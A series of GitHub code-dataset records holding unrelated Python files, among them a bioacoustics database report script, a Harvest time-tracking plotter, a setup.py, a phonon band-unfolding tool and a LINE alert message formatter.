a.id_level = {id_level} \n    \"\"\"\n\nQUERY__ID_LEVEL_ANOTATIONS_COUNT = \"\"\"SELECT count(*) \n    FROM libro_animalis.annotation_of_species as a\n    LEFT JOIN (record AS r) ON r.id = a.record_id\n    WHERE r.collection_id = {collection_id} AND\n    a.id_level = {id_level} \n    \"\"\"\nQUERY_ANNOTATION_INTERVALL_DURATION = \"\"\"\n    SELECT (a.end_time - a.start_time) as duration FROM libro_animalis.annotation_interval as a\n\t LEFT JOIN (record AS r) ON r.id = a.record_id\n\t WHERE r.collection_id = {collection_id}\n\"\"\"\nQUERY_ANNOTATION_INTERVALL_COUNT = \"\"\"\n    SELECT COUNT(*) as count FROM libro_animalis.annotation_interval as a\n\t LEFT JOIN (record AS r) ON r.id = a.record_id\n\t WHERE r.collection_id = {collection_id}\n\"\"\"\n\n\ndef list_to_csv(data: list, file_path: Path, head_row: List[str]):\n    with open(file_path, \"w\") as out:\n        csv_out = csv.writer(out)\n        csv_out.writerow(head_row)\n        for row in data:\n            csv_out.writerow(row)\n\n\ndef add_filename(data_frame: DataFrame, filename: str) -> DataFrame:\n    # data_frame.assign(filename=filename)\n    data_frame[\"filename\"] = data_frame.apply(lambda x: filename, axis=1)\n    tmp = data_frame[\"filename\"]\n    data_frame.drop(labels=[\"filename\"], axis=1, inplace=True)\n    data_frame.insert(0, \"filename\", tmp)\n    return data_frame.copy(deep=True)\n\n\ndef create_merged_raven_files(list_of_files: List[CorespondingFiles]):\n\n    annotations = list(\n        map(\n            lambda x: add_filename(\n                read_csv(\n                    open(x.annoation_file, \"rb\"),\n                    delimiter=\"\\t\",\n                    encoding=\"unicode_escape\",\n                ),\n                x.audio_file.name,\n            ),\n            list_of_files,\n        ),\n    )\n    result = concat(annotations)\n    return result\n\n\ndef merge_species_lists(dict, id_level_species_count_list, key):\n    for entry in id_level_species_count_list:\n\n        if entry[0] not in dict:\n            dict[entry[0]] = {\n                \"names\": list(entry[0:4]),\n                key: entry[4],\n            }\n        else:\n            dict[entry[0]][key] = entry[4]\n    return dict\n\n\ndef create_metrics(\n    data_path=None,\n    report_path=None,\n    config_path=None,\n    missing_species=None,\n    collectionId=None,\n):\n    config = parse_config(config_path)\n\n    list_of_files = get_record_annoation_tupels_from_directory(\n        data_path,\n        record_file_ending=config.files.record_file_ending,\n        annoation_file_ending=config.files.annoation_file_ending,\n    )\n\n    # check if all filenames are valid\n    # info(\"Merging files\")\n    all_data = create_merged_raven_files(list_of_files)\n\n    # write merged raven file\n    all_data.to_csv(\n        report_path.joinpath(\"merged_raven_annoations.txt\"), sep=\"\\t\",\n    )\n\n    annotated_segments = all_data.query(\n        \"SpeciesCode == 'TD_Start_End' & Channel == 1\"\n    ).shape[0]\n\n    sound_signals_total = all_data.query(\n        'SpeciesCode != \"TD_Start_End\" & SpeciesCode != \"BACKGROUND\" & Channel == 1'\n    ).SpeciesCode.shape[0]\n\n    clicks_count = all_data.query(\n        'SpeciesCode == \"ABAR_Click\" & Channel == 4'\n    ).SpeciesCode.shape[0]\n\n    info(\"Start querying database\")\n    with connectToDB(config.database) as db_connection:\n        # start import files\n        with db_connection.cursor() as db_cursor:\n            db_cursor: MySQLCursor\n            # -- id_level_1_species_count\n            db_cursor.execute(\n                QUERY_ID_LEVEL_COUNT.format(collection_id=collectionId, id_level=1)\n            )\n            id_level_1_species_count = list(db_cursor.fetchall())\n            # -- id_level_2_species_count\n            db_cursor.execute(\n                QUERY_ID_LEVEL_COUNT.format(collection_id=collectionId, id_level=2)\n            )\n            id_level_2_species_count = list(db_cursor.fetchall())\n            # -- id_level_3_species_count\n            db_cursor.execute(\n                QUERY_ID_LEVEL_COUNT.format(collection_id=collectionId, 
id_level=3)\n )\n id_level_3_species_count = list(db_cursor.fetchall())\n\n dict = merge_species_lists({}, id_level_1_species_count, \"id_1\")\n dict = merge_species_lists(dict, id_level_2_species_count, \"id_2\")\n dict = merge_species_lists(dict, id_level_3_species_count, \"id_3\")\n\n id_level_species_count = []\n\n for species in dict:\n id_level_species_count.append(\n dict[species][\"names\"]\n + [\n dict[species][\"id_1\"] if \"id_1\" in dict[species] else 0,\n dict[species][\"id_2\"] if \"id_2\" in dict[species] else 0,\n dict[species][\"id_3\"] if \"id_3\" in dict[species] else 0,\n ]\n )\n\n # -- vocalization_type_count\n db_cursor.execute(\n QUERY_VOCALIZATIOM_TYPE_COUNT.format(\n collection_id=collectionId, id_level=1\n )\n )\n vocalization_type_count = list(db_cursor.fetchall())\n\n # --- length_of_id_level_1_annoations\n db_cursor.execute(\n QUERY_LENGTH_OF_ID_LEVEL_ANOTATIONS.format(\n collection_id=collectionId, id_level=1\n )\n )\n length_of_id_level_1_annoations = list(db_cursor.fetchall())[0][0]\n\n # --- length_of_id_level_2_annoations\n db_cursor.execute(\n QUERY_LENGTH_OF_ID_LEVEL_ANOTATIONS.format(\n collection_id=collectionId, id_level=2\n )\n )\n length_of_id_level_2_annoations = list(db_cursor.fetchall())[0][0]\n\n # -- length_of_id_level_3_annoations\n db_cursor.execute(\n QUERY_LENGTH_OF_ID_LEVEL_ANOTATIONS.format(\n collection_id=collectionId, id_level=3\n )\n )\n length_of_id_level_3_annoations = list(db_cursor.fetchall())[0][0]\n\n # - level_1_annoations_count\n db_cursor.execute(\n QUERY__ID_LEVEL_ANOTATIONS_COUNT.format(\n collection_id=collectionId, id_level=1\n )\n )\n level_1_annoations_count = list(db_cursor.fetchall())[0][0]\n # - level_2_annoations_count\n db_cursor.execute(\n QUERY__ID_LEVEL_ANOTATIONS_COUNT.format(\n collection_id=collectionId, id_level=2\n )\n )\n level_2_annoations_count = list(db_cursor.fetchall())[0][0]\n # - level_3_annoations_count\n db_cursor.execute(\n QUERY__ID_LEVEL_ANOTATIONS_COUNT.format(\n collection_id=collectionId, id_level=3\n )\n )\n level_3_annoations_count = list(db_cursor.fetchall())[0][0]\n\n # - file_count\n db_cursor.execute(QUERY_RECORD_COUNT.format(collection_id=collectionId))\n file_count = list(db_cursor.fetchall())[0][0]\n\n # - file_duration\n db_cursor.execute(QUERY_RECORD_DURATION.format(collection_id=collectionId))\n file_duration = list(db_cursor.fetchall())[0][0]\n\n # - annotation_segments\n db_cursor.execute(\n QUERY_ANNOTATION_INTERVALL_DURATION.format(collection_id=collectionId)\n )\n result = db_cursor.fetchall()\n\n annotated_segments_durations = (\n [x[0] for x in result] if (len(result) > 0) else [0]\n )\n annotated_segments_duration = sum(annotated_segments_durations)\n annotated_segments_max = max(annotated_segments_durations)\n annotated_segments_min = min(annotated_segments_durations)\n annotated_segments_median = median(annotated_segments_durations)\n\n # -- write csv files\n list_to_csv(\n id_level_species_count,\n report_path.joinpath(\"id_level_species_count.csv\"),\n [\n \"latin_name\",\n \"olaf_code\",\n \"german_name\",\n \"english_name\",\n \"id_1\",\n \"id_2\",\n \"id_3\",\n ],\n )\n list_to_csv(\n vocalization_type_count,\n report_path.joinpath(\"vocalization_type_count.csv\"),\n [\n \"latin_name\",\n \"olaf_code\",\n \"german_name\",\n \"english_name\",\n \"vocalization_type\",\n \"count\",\n ],\n )\n\n # print(annotated_segments)\n # print(sound_signals_total)\n # print(level_1_annoations_count)\n # print(length_of_id_level_1_annoations)\n lines = [\n 
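# (label, value) pairs; each is written below as a \"label: value\" line in metrics.txt\n        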
(\"annotated_file_count\", file_count),\n (\"annotated_file_duration\", file_duration),\n (\"annotated_segments\", annotated_segments),\n (\"annotated_segments_duration\", annotated_segments_duration),\n (\"annotated_segments_max\", annotated_segments_max),\n (\"annotated_segments_min\", annotated_segments_min),\n (\"annotated_segments_median\", annotated_segments_median),\n (\"sound_signals_total\", sound_signals_total),\n (\"click_count\", clicks_count),\n (\"level_1_annoations_count\", level_1_annoations_count),\n (\"length_of_id_level_1_annoations\", length_of_id_level_1_annoations),\n (\"level_2_annoations_count\", level_2_annoations_count),\n (\"length_of_id_level_2_annoations\", length_of_id_level_2_annoations),\n (\"level_3_annoations_count\", level_3_annoations_count),\n (\"length_of_id_level_3_annoations\", length_of_id_level_3_annoations),\n ]\n metrics_filepath = report_path.joinpath(\"metrics.txt\")\n with open(metrics_filepath, \"w\") as text_file:\n for line in lines:\n text_file.write(\"{}: {}\\n\".format(line[0], line[1]))\n if missing_species is not None:\n missing_species_filepath = report_path.joinpath(\"missing_species.txt\")\n with open(missing_species_filepath, \"w\") as text_file:\n text_file.writelines(list(map(lambda x: x + \"\\n\", missing_species)))\n\n # print(\"End\")\n\n\nif __name__ == \"__main__\":\n create_metrics()\n","repo_name":"hdogan84/database","sub_path":"src/create_import_report_olaf.py","file_name":"create_import_report_olaf.py","file_ext":"py","file_size_in_byte":12809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23596476944","text":"import requests\nimport os\nimport copy\nimport datetime\nfrom collections import defaultdict\nfrom typing import List\n\nfrom django.conf import settings\n\nimport matplotlib.pyplot as plt\nimport matplotlib.lines as lns\n\n\n# === UTILITY FUNCTIONS\n\ndef yesterday() -> datetime.date:\n today = datetime.date.today()\n return today - datetime.timedelta(days=1)\n\n\ndef get_week_by_day(reference_datetime: datetime.datetime) -> List[datetime.datetime]:\n reference_datetime = datetime.datetime(year=reference_datetime.year,\n month=reference_datetime.month,\n day=reference_datetime.day)\n week_datetimes = [reference_datetime]\n\n for i in range(1, reference_datetime.weekday() + 1):\n _datetime = reference_datetime - datetime.timedelta(days=i)\n week_datetimes = [_datetime] + week_datetimes\n\n for j in range(1, 6 - reference_datetime.weekday() + 1):\n _datetime = reference_datetime + datetime.timedelta(days=j)\n week_datetimes = week_datetimes + [_datetime]\n\n return week_datetimes\n\n\n# === DATA PROCESSING\n\nclass HarvestApi:\n\n def __init__(self):\n self.headers = {\n 'Authorization': f'Bearer {settings.HARVEST_ACCESS_TOKEN}',\n 'Harvest-Account-Id': f'{settings.HARVEST_ACCOUNT_ID}',\n 'User-Agent': 'Electronic Heart'\n }\n self.session = requests.Session()\n self.session.headers.update(self.headers)\n self.url = settings.HARVEST_API_URL\n\n def get(self, endpoint: str, params: dict = {}) -> requests.Response:\n \"\"\"\n\n :raises requests.exceptions.HTTPError: In case the request is invalid, meaning the response has a non\n 2xx status code!\n :param endpoint:\n :param params:\n :return:\n \"\"\"\n url = os.path.join(self.url, endpoint)\n print(self.url)\n print(url)\n response = self.session.get(url, params=params)\n\n return response\n\n def get_all_time_entries(self) -> List[dict]:\n \"\"\"\n Fetches and returns a list of all time entry objects 
from the api.\n\n :return:\n \"\"\"\n time_entries = []\n\n next_page = 1\n while next_page is not None:\n try:\n response = self.get('time_entries', {'page': next_page})\n # This method will make the response actually raise an exception if the response status is not 2xx!\n # Usually the get call would not do this and only raise an error if there was an actual timeout or smth\n # like that. I like this, since it explicitly forces the top layers to handle a bad return.\n response.raise_for_status()\n\n data = response.json()\n time_entries += data['time_entries']\n next_page = data['next_page']\n except requests.exceptions.HTTPError as e:\n print('Harvest Error: ' + str(e))\n break\n\n return time_entries\n\n\ndef create_projects_dict(time_entries: List[dict]) -> dict:\n projects_dict = copy.deepcopy(settings.HARVEST_PROJECTS)\n\n # 1.Adding the raw time entry list to each project\n for project_id, project_data in projects_dict.items():\n project_data['time_entries'] = [time_entry\n for time_entry in time_entries\n if (time_entry['project']['name'], time_entry['task']['name']) == project_id]\n\n # 2.We want a processed data structure from these raw entries which tells us the cumulative time spent\n # per project and per day.\n for project_id, project_data in projects_dict.items():\n daily_hours = defaultdict(float)\n\n for time_entry in project_data['time_entries']:\n date = time_entry['spent_date']\n daily_hours[date] += time_entry['hours']\n\n project_data['daily_hours'] = dict(daily_hours)\n\n return projects_dict\n\n\ndef get_projects_total_over_timespan(projects_dict: dict,\n start_datetime: datetime.datetime,\n end_datetime: datetime.datetime):\n projects_total = {project_id: 0 for project_id in projects_dict.keys()}\n\n for project_id, project_data in projects_dict.items():\n\n for date_string, hours in project_data['daily_hours'].items():\n _datetime = datetime.datetime.strptime(date_string, settings.HARVEST_DATETIME_FORMAT)\n if start_datetime <= _datetime <= end_datetime:\n projects_total[project_id] += hours\n\n return projects_total\n\n\n# === CREATING OF PLOTS\n\n\ndef plot_daily_hours_over_timespan(axes: plt.Axes,\n projects_dict: dict,\n start_datetime=datetime.datetime.now(),\n end_datetime=datetime.datetime.now(),\n ) -> plt.Axes:\n\n # ~ Populating the plot\n dts = [(start_datetime + datetime.timedelta(days=offset))\n for offset in range((end_datetime - start_datetime).days + 1)]\n\n for index, dt in enumerate(dts, start=1):\n\n date_string = dt.strftime(settings.HARVEST_DATETIME_FORMAT)\n previous_hours = 0\n for project_id, project_data in projects_dict.items():\n if date_string in project_data['daily_hours']:\n hours = project_data['daily_hours'][date_string]\n axes.bar(x=index,\n bottom=previous_hours,\n height=hours,\n color=project_data['color'])\n\n previous_hours += hours\n\n axes.text(x=index,\n y=previous_hours + 0.1,\n s=f'{previous_hours:0.2f}',\n fontsize='large',\n ha='center')\n\n # ~ Additional plot info\n yticks = list(range(1, len(dts) + 1))\n axes.set_xlim(yticks[0] - 0.5, yticks[-1] + 0.5)\n axes.set_xticks(yticks)\n axes.set_xticklabels([dt.strftime('%d.%m.%Y\\n(%A)') for dt in dts])\n axes.set_ylim(0, 12)\n axes.set_title('Daily hours')\n\n custom_lines = []\n custom_labels = []\n for project_id, project_data in projects_dict.items():\n custom_lines.append(lns.Line2D([0], [0], color=project_data['color'], lw=3))\n custom_labels.append(project_data['label'])\n axes.legend(custom_lines, custom_labels)\n\n return axes\n\n\ndef 
plot_project_total_over_timespan(axes: plt.Axes,\n                                     projects_dict: dict,\n                                     start_datetime=datetime.datetime.now(),\n                                     end_datetime=datetime.datetime.now()\n                                     ) -> plt.Axes:\n    # Convenience feature: The start and end datetime can be given as strings, as that\n    # is often a lot easier for the user. These will be automatically converted into\n    # datetime objects\n    datetime_format = '%Y-%m-%d'\n    if isinstance(start_datetime, str):\n        start_datetime = datetime.datetime.strptime(start_datetime, datetime_format)\n    if isinstance(end_datetime, str):\n        end_datetime = datetime.datetime.strptime(end_datetime, datetime_format)\n\n    # ~ Populating the plot\n    projects_total = defaultdict(float)\n    for index, (project_id, project_data) in enumerate(projects_dict.items(), start=1):\n\n        for date_string, hours in project_data['daily_hours'].items():\n            dt = datetime.datetime.strptime(date_string, datetime_format)\n            if start_datetime <= dt <= end_datetime:\n                projects_total[project_id] += hours\n\n        # Now that the previous loop over all entries of daily working hours\n        # has been processed, we can plot the final value for the current project\n        total_hours = projects_total[project_id]\n        axes.barh(y=index,\n                  width=total_hours,\n                  label=project_data['label'],\n                  color=project_data['color'])\n\n        # Besides the bar itself there will also be a text label with the actual value\n        axes.text(y=index,\n                  x=total_hours + 0.05,\n                  s=f'{total_hours:0.2f}',\n                  fontsize='large',\n                  va='center')\n\n    # ~ Additional plot info\n    total_hours = sum(hours for hours in projects_total.values())\n    max_hours = max(hours for hours in projects_total.values())\n    axes.set_title(f'Total hours: {total_hours:0.2f}')\n    axes.set_yticks(list(range(1, len(projects_total) + 1)))\n    axes.set_yticklabels([d['label'] for d in projects_dict.values()])\n    axes.set_xlabel('time in hours')\n    axes.set_xlim(0, max_hours + 2)\n    axes.legend()\n\n    return axes\n\n\n
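# Usage sketch for the two plotting helpers above (illustrative only; assumes a\n# populated projects_dict from create_projects_dict, and start_dt/end_dt datetimes):\n#   fig, (ax1, ax2) = plt.subplots(1, 2)\n#   plot_daily_hours_over_timespan(ax1, projects_dict, start_dt, end_dt)\n#   plot_project_total_over_timespan(ax2, projects_dict, '2021-01-04', '2021-01-10')\n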
def plot_weekly_total_by_project(axes: plt.Axes,\n                                 projects_dict: dict,\n                                 start_datetime: datetime.datetime,\n                                 end_datetime: datetime.datetime,\n                                 datetime_format: str = '%Y-%m-%d',\n                                 cumulative_color=(0, 0, 0, 0.1)):\n    # ~ Generating the weeks\n    current_week = get_week_by_day(start_datetime)\n    weeks = [current_week]\n    while current_week[-1] < end_datetime:\n        current_week = [dt + datetime.timedelta(weeks=1) for dt in current_week]\n        weeks.append(current_week)\n\n    # ~ Populating the plot\n    axes_total = axes.twinx()\n    # axes_total, axes = axes, axes_total\n\n    projects_weekly_total = defaultdict(list)\n    indices = list(range(1, len(weeks) + 1))\n    for index, week in zip(indices, weeks):\n\n        projects_total = get_projects_total_over_timespan(projects_dict,\n                                                          start_datetime=week[0],\n                                                          end_datetime=week[-1])\n        print(list(projects_dict.values())[0].keys())\n        print(week[0], week[1], projects_total)\n        for project_id, project_data in projects_dict.items():\n            weekly_total = projects_total[project_id]\n            projects_weekly_total[project_id].append(weekly_total)\n            axes.scatter(x=index,\n                         y=weekly_total,\n                         color=project_data['color'],\n                         lw=3)\n\n        total = sum(hours for hours in projects_total.values())\n        axes_total.bar(x=index,\n                       height=total,\n                       width=0.4,\n                       color=cumulative_color)\n\n    for project_id, project_data in projects_dict.items():\n        axes.plot(indices, projects_weekly_total[project_id],\n                  color=project_data['color'],\n                  label=project_data['label'],\n                  lw=3)\n\n    # ~ Additional plot info\n    axes.set_title('Total weekly hours')\n    axes.set_ylabel('time in hours')\n    axes.set_ylim(0)\n    axes.set_xticks(indices)\n    axes.set_xticklabels([week[0].strftime(datetime_format) for week in weeks])\n    axes.legend()\n\n    axes_total.set_ylim(0, 50)\n    axes_total.set_ylabel('cumulative time in hours', color='gray')\n    axes_total.tick_params(labelcolor='gray')\n\n    return axes\n","repo_name":"the16thpythonist/electronicheart","sub_path":"hours/harvest.py","file_name":"harvest.py","file_ext":"py","file_size_in_byte":11152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72256423849","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n    long_description = fh.read()\n\nsetuptools.setup(\n    name=\"sweetpea\",\n    version=\"0.0.20\",\n    author=\"Annie Cherkaev, Ben Draut\",\n    author_email=\"annie.cherk@gmail.com, drautb@cs.utah.edu\",\n    description=\"A language for synthesizing randomized experimental designs\",\n    long_description=long_description,\n    long_description_content_type=\"text/markdown\",\n    url=\"https://github.com/anniecherk/sweetpea-py\",\n    packages=setuptools.find_packages(),\n    install_requires=[\n        'docker',\n        'requests',\n        'ascii-graph'\n    ],\n    classifiers=[\n        \"Programming Language :: Python :: 3\",\n        \"License :: OSI Approved :: MIT License\",\n        \"Operating System :: OS Independent\",\n    ],\n    test_suite='nose.collector',\n    tests_require=['nose']\n)\n","repo_name":"anniecherk/sweetpea-py","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40637040418","text":"mytuple1 = (1,2,3,4,5)\nprint(mytuple1)\n\nfrom collections import namedtuple\n\ncar = namedtuple('car', ['make', 'model', 'price', 'horsepower', 'seats'])\n\nchevy_blazer = car('Chevrolet', 'Blazer', 32000, 275, 8)\n\nprint(chevy_blazer)\n","repo_name":"davidseungjin/Python","sub_path":"ch0301_related2.py","file_name":"ch0301_related2.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34210501299","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport math\nimport argparse\nimport numpy as np\nimport typing as tp\n\nPROG = os.path.basename(sys.argv[0])\n\ntry:\n    import rsp2\n    import unfold_lib\n    import unfold\n    from rsp2.io import dwim\n    from unfold_lib import coalesce\nexcept ImportError:\n    info = lambda s: print(s, file=sys.stderr)\n    info('Please add the following to your PYTHONPATH:')\n    info('  (rsp2 source root)/scripts')\n    info('  (rsp2 source root)/src/python')\n    info(\"Or alternatively, create a conda environment from rsp2's environment.yml\")\n    sys.exit(1)\n\ndef main():\n    parser = argparse.ArgumentParser(\n        description=\n        'A more limited form of unfold.py that extracts band data unfolded onto '\n        \"just one or more specific kpoints (using some of unfold.py's intermediate \"\n        \"output files as input).\",\n    )\n    parser.add_argument(\n        'STRUCTURE', help=\n        'Path to initial structure in rsp2 directory structure format.',\n    )\n    parser.add_argument(\n        '--multi-qpoint-file', required=True, help=\n        'Path to multi-qpoint.yaml file (see the unfold.py script for more details)',\n    )\n\n    parser.add_argument(\n        '--coalesce-threshold', type=float,\n        metavar='THRESHOLD', help=\n        'Coalesce modes of similar eigenvalue into one for reduced output size. 
'\n 'When using this, some mode probabilities may exceed 1.'\n )\n parser.add_argument(\n '--probs-threshold', type=float, default=1e-7, help=\n 'Truncate probabilities smaller than this when writing output. '\n )\n\n v2_to_v3 = lambda v2: np.array(list(v2) + [0])\n jorio_radians = lambda rad: v2_to_v3(jorio_rband_pfrac(rad))\n jorio_degrees = lambda deg: parse_jorio_radians(math.radians(deg))\n parse_jorio_radians = lambda s: jorio_radians(float(s))\n parse_jorio_degrees = lambda s: jorio_degrees(float(s))\n parser.set_defaults(kpoints=[])\n parser.add_argument(\n '--jorio-degrees',\n action='append', dest='kpoints', type=parse_jorio_degrees, help=\n \"Unfold onto Jorio's q(theta), for the specified angle in degrees.\",\n )\n parser.add_argument(\n '--jorio-radians',\n action='append', dest='kpoints', type=parse_jorio_radians, help=\n \"Unfold onto Jorio's q(theta), for the specified angle in radians.\",\n )\n parser.add_argument(\n '--kpoint',\n action='append', dest='kpoints', type=unfold.TaskQpointSfrac.parse, help=\n 'Unfold onto this K-point, in fractional coordinates of the '\n 'primitive reciprocal cell, as a whitespace-separated list of '\n '3 floats, or rational numbers.'\n )\n\n parser.set_defaults(output=[])\n parser.add_argument(\n '--output', action='append', help=\n 'Output file for a single kpoint. Must be specified once for each '\n \"option that defines a kpoint. (any format supported by rsp2's DWIM\"\n 'IO mechanisms, e.g. .json.xz)',\n )\n args = parser.parse_args()\n\n if not args.kpoints:\n parser.error('No points specified to unfold onto!')\n\n if len(args.kpoints) != len(args.output):\n parser.error('Number of kpoints to unfold onto must match number of output files!')\n\n sdir = rsp2.io.structure_dir.from_path(args.STRUCTURE)\n multi_qpoint_data = unfold.TaskMultiQpointData.read_file(args.multi_qpoint_file, probs_threshold=1e-7)\n main_(\n sdir=sdir,\n multi_qpoint_data=multi_qpoint_data,\n kpoints_pfrac=np.array(args.kpoints),\n output_paths=args.output,\n coalesce_threshold=args.coalesce_threshold,\n probs_threshold=args.probs_threshold,\n )\n\ndef main_(\n sdir: rsp2.io.structure_dir.StructureDir,\n multi_qpoint_data: dict,\n kpoints_pfrac: np.ndarray,\n output_paths: tp.List[str],\n coalesce_threshold: tp.Optional[float],\n probs_threshold: float,\n):\n sc_matrix = sdir.layer_sc_matrices[0]\n supercell = unfold_lib.Supercell(sc_matrix)\n super_lattice = sdir.structure.lattice.matrix\n prim_lattice = np.linalg.inv(sc_matrix) @ super_lattice\n\n super_recip_lattice = np.linalg.inv(super_lattice).T\n prim_recip_lattice = np.linalg.inv(prim_lattice).T\n\n kpoints_pfrac %= 1\n\n resampled = unfold.resample_qg_indices(\n super_lattice=super_lattice,\n supercell=supercell,\n qpoint_sfrac=multi_qpoint_data['qpoint-sfrac'],\n path_kpoint_pfracs=np.array(kpoints_pfrac),\n )\n resampled_qs = resampled['Q']\n resampled_gs = resampled['G']\n\n closest_images_sfrac = np.array(multi_qpoint_data['qpoint-sfrac'])[resampled_qs] + supercell.gpoint_sfracs()[resampled_gs]\n closest_images_cart = closest_images_sfrac @ super_recip_lattice\n closest_images_cart = unfold_lib.reduce_carts(closest_images_cart, prim_recip_lattice)\n\n kpoints_cart = kpoints_pfrac @ prim_recip_lattice\n\n # The point we actually unfolded onto might not be the point we wanted.\n # Check how far the two points are from each other and record it.\n errors_cart = np.array([\n unfold_lib.shortest_image_norm(diff, prim_recip_lattice)\n for diff in kpoints_cart - closest_images_cart\n ])\n\n for i in 
range(len(resampled_qs)):\n        resampled_q = resampled_qs[i]\n        resampled_g = resampled_gs[i]\n        error_distance = np.linalg.norm(errors_cart[i])\n\n        ev_frequencies = multi_qpoint_data['mode-data']['ev_frequencies'][resampled_q]\n        ev_probs = multi_qpoint_data['probs'][resampled_q].T[resampled_g]\n        ev_probs = np.asarray(ev_probs.todense()).squeeze()\n\n        if coalesce_threshold is not None:\n            splits = list(unfold_lib.coalesce.get_splits(ev_frequencies, coalesce_threshold))\n            ev_probs = unfold_lib.coalesce.coalesce(splits, ev_probs, 'sum')\n            ev_probs = ev_probs[splits[:-1]]\n            ev_frequencies = unfold_lib.coalesce.coalesce(splits, ev_frequencies, 'mean')\n            ev_frequencies = ev_frequencies[splits[:-1]]\n\n        mask = ev_probs > probs_threshold\n        ev_probs = ev_probs[mask]\n        ev_frequencies = ev_frequencies[mask]\n\n        dwim.to_path(output_paths[i], {\n            'sample-error-distance': error_distance,\n            'ev-probs': ev_probs.tolist(),\n            'ev-frequencies': ev_frequencies.tolist(),\n        })\n\n# ------------------------------------------------------\n\ndef rotation_matrix_22(angle):\n    c, s = math.cos(angle), math.sin(angle)\n    return np.array([[c, -s], [s, c]])\n\ndef rotation_matrix_33(angle):\n    c, s = math.cos(angle), math.sin(angle)\n    return np.array([[c, -s, 0], [s, c, 0], [0, 0, 1]])\n\ndef jorio_rband_pfrac(twist_angle):\n    jorio_lattice = np.array([[1, 0], [-0.5, 0.5*3**0.5]]) @ rotation_matrix_22(np.radians(90)).T\n\n    cos, sin = math.cos(twist_angle), math.sin(twist_angle)\n    q_jorio_cart = (3**-0.5) * np.array([\n        -(1 - cos) - 3**0.5 * sin,\n        -3**0.5 * (1 - cos) + sin,\n    ])\n\n    q_pfrac = q_jorio_cart @ jorio_lattice.T\n    return q_pfrac\n\n# ------------------------------------------------------\n\ndef warn(*args, **kw):\n    print(f'{PROG}:', *args, file=sys.stderr, **kw)\n\ndef die(*args, code=1):\n    warn('Fatal:', *args)\n    sys.exit(code)\n\n# ------------------------------------------------------\n\nif __name__ == '__main__':\n    main()\n","repo_name":"ExpHP/rsp2","sub_path":"scripts/unfold-special.py","file_name":"unfold-special.py","file_ext":"py","file_size_in_byte":7302,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"38995919947","text":"from datetime import datetime\nimport copy\n\n\nclass lineMessageFormate:\n    def __init__(self,dataModel,messageType):\n        \n        self.dataModel = dataModel\n        self.messageType = messageType\n        self.ReceiverLineIdList = []\n        self.messages = []\n        self.content = []\n\n    def Addcontent(self,imageUrl,title,text):\n        \n        data = {\n            \"imageUrl\":imageUrl,\n            \"title\":title,\n            \"text\":text\n        }\n        \n        self.content.append(data)\n        \n        \n    def formate_member(self):\n        \n        for model in self.dataModel:\n            \n            print(model)\n\n            self.ReceiverLineIdList.append(model[\"lineId\"]) \n            \n            self.Addcontent(model[\"sourceImage\"][\"imageUrl\"],\"Source image\",\"Time: {} \n Check-in result: success\".format(datetime.fromtimestamp(int(model['sourceImage']['timestamp'] + 28800))))\n            self.Addcontent(model[\"sourceFaceImage\"][\"imageUrl\"],\"Source face\",\"Confidence: {} %\".format(round(model[\"sourceFaceImage\"][\"confidence\"],2)))\n            self.Addcontent(model[\"registrationFaceImage\"][\"imageUrl\"],\"Registered image\",\"Name: {}\nfaceId: {}\nSimilarity: {}%\"\n            .format(model[\"registrationFaceImage\"][\"memberId\"],model[\"registrationFaceImage\"][\"faceId\"][0:18],round(model[\"registrationFaceImage\"][\"similarity\"],2)))\n            \n\n            \n            message = {\n                \"messageType\": self.messageType,\n                \"content\": copy.deepcopy(self.content)\n                \n            }\n            \n            self.messages.append(message)\n            \n            self.content.clear()\n        \n    def formate_Notmember(self):\n        \n        
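# One message is emitted per detected non-member face below; each pairs the\n        # overview source image with the cropped face image and its confidence.\n        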
counter = 0\n        \n        \n        #for lineid in self.dataModel[\"notMemberAlertMessage\"][\"receiverLineIdList\"]:\n        self.ReceiverLineIdList = self.dataModel[\"receiverLineIdList\"]\n        \n        for model in self.dataModel[\"notMemberFaceImageList\"]:\n            \n            self.Addcontent(self.dataModel[\"sourceImage\"][\"imageUrl\"],\"Source image\",\"Person count: {}\\nNon-member count: {}\\nTime: {}\"\n            .format(self.dataModel[\"sourceImage\"][\"personCount\"],self.dataModel[\"sourceImage\"][\"notMemberCount\"],datetime.fromtimestamp(int(self.dataModel['sourceImage']['timestamp'] + 28800))))\n            self.Addcontent(model[\"imageUrl\"],\"Non-member \"+str(counter),\"Confidence: {} %\".format(round(model[\"confidence\"],2)))\n\n            message = {\n                \"messageType\": self.messageType,\n                \"content\": copy.deepcopy(self.content)\n                \n            }\n\n            counter += 1\n            \n            self.messages.append(message)\n            \n            self.content.clear()\n        \n    def formate_quota(self):\n        \n        self.ReceiverLineIdList = self.dataModel[\"receiverLineIdList\"]\n        \n        for model in self.dataModel[\"notMemberFaceImageList\"]:\n            \n            message = {\n                \"messageType\": self.messageType,\n                \"content\": \"Quota exhausted, please contact the service provider\"\n                \n            }\n            \n\n            self.messages.append(message)\n            \n            \n    def getdata(self):\n        \n        LinepushModel = {\n            \"receiverLineIdList\" : self.ReceiverLineIdList,\n            \"messages\" : self.messages\n        }\n        \n        print(LinepushModel)\n        \n        return self.ReceiverLineIdList , self.messages","repo_name":"ilab-1624/weekAPIGateway","sub_path":"lambda/EdwardWeb_alertNotify/dataFormated.py","file_name":"dataFormated.py","file_ext":"py","file_size_in_byte":3429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5711597619","text":"#!/usr/bin/env python3\n###########################################################\n# Authors: Joel Anyanti, Jui-Chieh Chang, Alex Condotti\n# Carnegie Mellon University\n# 11-785 (Introduction to Deep Learning)\n#\n# main.py\n###########################################################\n# Imports\n###########################################################\nimport sys, os, time\nimport imageio\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\nfrom IPython.display import 